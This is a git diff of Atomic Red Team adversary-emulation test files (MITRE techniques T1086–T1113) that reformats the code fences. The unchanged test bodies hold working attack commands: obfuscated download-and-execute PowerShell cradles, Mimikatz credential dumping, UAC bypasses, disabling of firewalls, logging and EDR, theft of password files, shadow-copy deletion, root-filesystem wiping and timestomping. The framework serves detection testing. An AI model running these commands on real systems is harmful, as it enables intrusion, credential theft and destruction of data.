+#### Run it with `powershell`! ``` (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -97,8 +94,7 @@ Run mimikatz via PsSendKeys **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ```
@@ -112,8 +108,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ```
@@ -133,8 +128,7 @@ Using PS 5.1, add a user via CLI | password | password to use | string | ATOM1CR3DT3@M| | description | Brief description of account | string | Atomic Things|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' ```
@@ -153,8 +147,7 @@ Not proxy aware removing cache although does not appear to write to those locati |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ```
@@ -173,8 +166,7 @@ Not proxy aware removing cache although does not appear to write to those locati |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ```
@@ -192,8 +184,7 @@ Powershell xml download request
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
 ```
@@ -211,8 +202,7 @@ Powershell invoke mshta to download payload
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
 ```
@@ -225,8 +215,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 **Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Powershell_ise as a Privileged Account
+#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
 2. Invoke-DownloadCradle.ps1
@@ -239,8 +228,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
 ```
diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md
index eb6b877a..13806a0c 100644
--- a/atomics/T1087/T1087.md
+++ b/atomics/T1087/T1087.md
@@ -54,8 +54,7 @@ Enumerate all accounts by copying /etc/passwd to another file
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 cat /etc/passwd > #{output_file}
 ```
@@ -72,8 +71,7 @@ xxx (requires root)
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 cat /etc/sudoers > #{output_file}
 ```
@@ -90,8 +88,7 @@ View accounts wtih UID 0
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user
 ```
@@ -103,8 +100,7 @@ List opened files by user
 **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
 ```
@@ -121,8 +117,7 @@ Show if a user account has ever logger in remotely
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 lastlog > #{output_file}
 ```
@@ -134,8 +129,7 @@ Utilize groups and id to enumerate users and groups
 **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 groups id
 ```
@@ -148,8 +142,7 @@ Utilize local utilities to enumerate users and groups
 **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_'
@@ -165,8 +158,7 @@ Enumerate all accounts
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net user net user /domain dir c:\Users\
@@ -183,8 +175,7 @@ Enumerate all accounts via PowerShell
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 net user net user /domain get-localuser
@@ -206,8 +197,7 @@ Enumerate logged on users
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 query user
 ```
@@ -219,8 +209,7 @@ Enumerate logged on users via PowerShell
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 query user
 ```
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index 45b94964..679cf329 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -34,8 +34,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe /c eventvwr.msc
 ```
@@ -53,8 +52,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc"
@@ -73,8 +71,7 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" fodhelper.exe 
@@ -93,8 +90,7 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 58e645b2..72cc56f0 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -33,8 +33,7 @@ Disables the iptables firewall
 **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service iptables stop
@@ -55,8 +54,7 @@ Disables syslog collection
 **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service rsyslog stop
@@ -75,8 +73,7 @@ Disable the Cb Response service
 **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service cbdaemon stop
@@ -95,8 +92,7 @@ Disables SELinux enforcement
 **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 setenforce 0
 ```
@@ -108,8 +104,7 @@ Disables Carbon Black Response
 **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
 ```
@@ -121,8 +116,7 @@ Disables LittleSnitch
 **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 ```
@@ -134,8 +128,7 @@ Disables OpenDNS Umbrella
 **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 ```
@@ -152,8 +145,7 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
 |------|-------------|------|---------------|
 | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
 fltmc.exe unload #{sysmon_driver}
 ```
@@ -171,8 +163,7 @@ This action requires HTTP logging configurations in IIS to be unlocked.
 |------|-------------|------|---------------|
 | website_name | The name of the website on a server | string | Default Web Site|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
 ```
@@ -184,8 +175,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
 sysmon -u
 ```
diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md
index cbf73a16..fe5296e0 100644
--- a/atomics/T1090/T1090.md
+++ b/atomics/T1090/T1090.md
@@ -31,8 +31,7 @@ Note that this test may conflict with pre-existing system configuration.
 | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
 | proxy_scheme | Protocol to proxy (http or https) | string | http|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 export #{proxy_scheme}_proxy=#{proxy_server}
 ```
diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md
index 46d1ac83..da71b4a2 100644
--- a/atomics/T1096/T1096.md
+++ b/atomics/T1096/T1096.md
@@ -26,8 +26,7 @@ Execute from Alternate Streams
 |------|-------------|------|---------------|
 | path | Path of ADS file | path | c:\ADS\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md
index 02d2b600..84ecd61d 100644
--- a/atomics/T1097/T1097.md
+++ b/atomics/T1097/T1097.md
@@ -27,8 +27,7 @@ Similar to PTH, but attacking Kerberos
 | user_name | username | string | Administrator|
 | domain | domain | string | atomic.local|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 mimikatz # kerberos::ptt #{user_name}@#{domain}
 ```
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index be4dab0b..ba9b7115 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -15,8 +15,7 @@ Manipulate Admin Account Name
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 $z = Get-Random -Minimum 2 -Maximum 9999
diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md
index 8d1f2314..739f6599 100644
--- a/atomics/T1099/T1099.md
+++ b/atomics/T1099/T1099.md
@@ -32,8 +32,7 @@ Stomps on the access timestamp of a file
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 touch -a -t 197001010000.00 #{target_filename}
 ```
@@ -50,8 +49,7 @@ Stomps on the modification timestamp of a file
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 touch -m -t 197001010000.00 #{target_filename}
 ```
@@ -71,8 +69,7 @@ Sudo or root privileges are required to change date. Use with caution.
 |------|-------------|------|---------------|
 | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 NOW=$(date) date -s "1970-01-01 00:00:00" touch #{target_filename}
@@ -96,8 +93,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
 | target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 touch -acmr #{reference_file_path} {target_file_path}
 ```
@@ -117,8 +113,7 @@ This technique was seen in use by the Stitch RAT.
 | file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
 | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
 ```
@@ -138,8 +133,7 @@ This technique was seen in use by the Stitch RAT.
 | file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
 | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
 ```
@@ -159,8 +153,7 @@ This technique was seen in use by the Stitch RAT.
 | file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
 | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
 ```
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 9f2ac967..0dbc17b7 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -25,8 +25,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
 | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
 | web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 xcopy #{web_shells} #{web_shell_path}
 ```
diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md
index dd62804c..45c1b52e 100644
--- a/atomics/T1101/T1101.md
+++ b/atomics/T1101/T1101.md
@@ -20,8 +20,7 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
 |------|-------------|------|---------------|
 | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' $SecurityPackagesUpdated = $SecurityPackages
diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md
index 5c34338e..06389b36 100644
--- a/atomics/T1103/T1103.md
+++ b/atomics/T1103/T1103.md
@@ -22,8 +22,7 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
 |------|-------------|------|---------------|
 | registry_file | Windows Registry File | Path | T1103.reg|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg.exe import #{registry_file}
 ```
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 4bd3477f..6337796e 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -41,8 +41,7 @@ Utilize rsync to perform a remote file copy (push)
 | remote_host | Remote host to copy toward | String | victim-host|
 | remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
 ```
@@ -62,8 +61,7 @@ Utilize rsync to perform a remote file copy (pull)
 | remote_host | Remote host to copy from | String | adversary-host|
 | local_path | Local path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
 ```
@@ -83,8 +81,7 @@ Utilize scp to perform a remote file copy (push)
 | remote_host | Remote host to copy toward | String | victim-host|
 | remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 scp #{local_file} #{username}@#{remote_host}:#{remote_path}
 ```
@@ -104,8 +101,7 @@ Utilize scp to perform a remote file copy (pull)
 | remote_host | Remote host to copy from | String | adversary-host|
 | local_path | Local path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 scp #{username}@#{remote_host}:#{remote_file} #{local_path}
 ```
@@ -125,8 +121,7 @@ Utilize sftp to perform a remote file copy (push)
 | remote_host | Remote host to copy toward | String | victim-host|
 | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
 ```
@@ -146,8 +141,7 @@ Utilize sftp to perform a remote file copy (pull)
 | remote_host | Remote host to copy from | String | adversary-host|
 | local_path | Local path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 ```
@@ -165,8 +159,7 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
 ```
@@ -184,8 +177,7 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath
@@ -209,8 +201,7 @@ This technique is used by Qbot malware to download payloads.
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path to place file | Path | Atomic-license.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
 ```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index b72842d2..193d78d4 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -44,8 +44,7 @@ Delete a single file from the temporary directory
 |------|-------------|------|---------------|
 | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 rm -f #{file_to_delete}
 ```
@@ -62,8 +61,7 @@ Recursively delete the temporary directory and all files contained within it
 |------|-------------|------|---------------|
 | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 rm -rf #{folder_to_delete}
 ```
@@ -80,8 +78,7 @@ Use the `shred` command to overwrite the temporary file and then delete it
 |------|-------------|------|---------------|
 | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 shred -u #{file_to_shred}
 ```
@@ -98,8 +95,7 @@ Delete a single file from the temporary directory using cmd.exe
 |------|-------------|------|---------------|
 | file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 del /f #{file_to_delete}
 ```
@@ -116,8 +112,7 @@ Recursively delete the temporary directory and all files contained within it usi
 |------|-------------|------|---------------|
 | folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 del /f /S #{folder_to_delete}
 ```
@@ -134,8 +129,7 @@ Delete a single file from the temporary directory using Powershell
 |------|-------------|------|---------------|
 | file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Remove-Item -path "#{file_to_delete}"
 ```
@@ -152,8 +146,7 @@ Recursively delete the temporary directory and all files contained within it usi
 |------|-------------|------|---------------|
 | folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Remove-Item -path "#{folder_to_delete}" -recurse
 ```
@@ -165,8 +158,7 @@ Delete all volume shadow copies with vssadmin.exe
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 vssadmin.exe Delete Shadows /All /Quiet
 ```
@@ -178,8 +170,7 @@ Delete all volume shadow copies with wmic
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wmic shadowcopy delete
 ```
@@ -191,8 +182,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no
 ```
@@ -205,8 +195,7 @@ This test deletes Windows Backup catalogs.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wbadmin delete catalog -quiet
 ```
@@ -218,8 +207,7 @@ This test deletes the entire root filesystem of a Linux system. This technique w
 **Supported Platforms:** Linux, CentOS, Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 rm -rf / --no-preserve-root > /dev/null 2> /dev/null
 ```
diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md
index 3688a13c..ceb3c7ba 100644
--- a/atomics/T1110/T1110.md
+++ b/atomics/T1110/T1110.md
@@ -47,8 +47,7 @@ Creates username and password files then attempts to brute force on remote host
 | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
 | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} echo "1q2w3e4r" >> #{input_file_passwords}
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 06ad2d53..f47edeb8 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -25,8 +25,7 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
 ```
@@ -39,8 +38,7 @@ CMD is ran as Administrative rights.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
 ```
@@ -52,8 +50,7 @@ Modify a registry key of each user profile not currently loaded on the machine u
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) $PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 01bf29ce..b5f3eb36 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -35,8 +35,7 @@ Use screencapture command to collect a full desktop screenshot
 | output_file | xxx | Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 screencapture
 ```
@@ -54,8 +53,7 @@ Use screencapture command to collect a full desktop screenshot
 | output_file | xxx | Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 screencapture -x
 ```
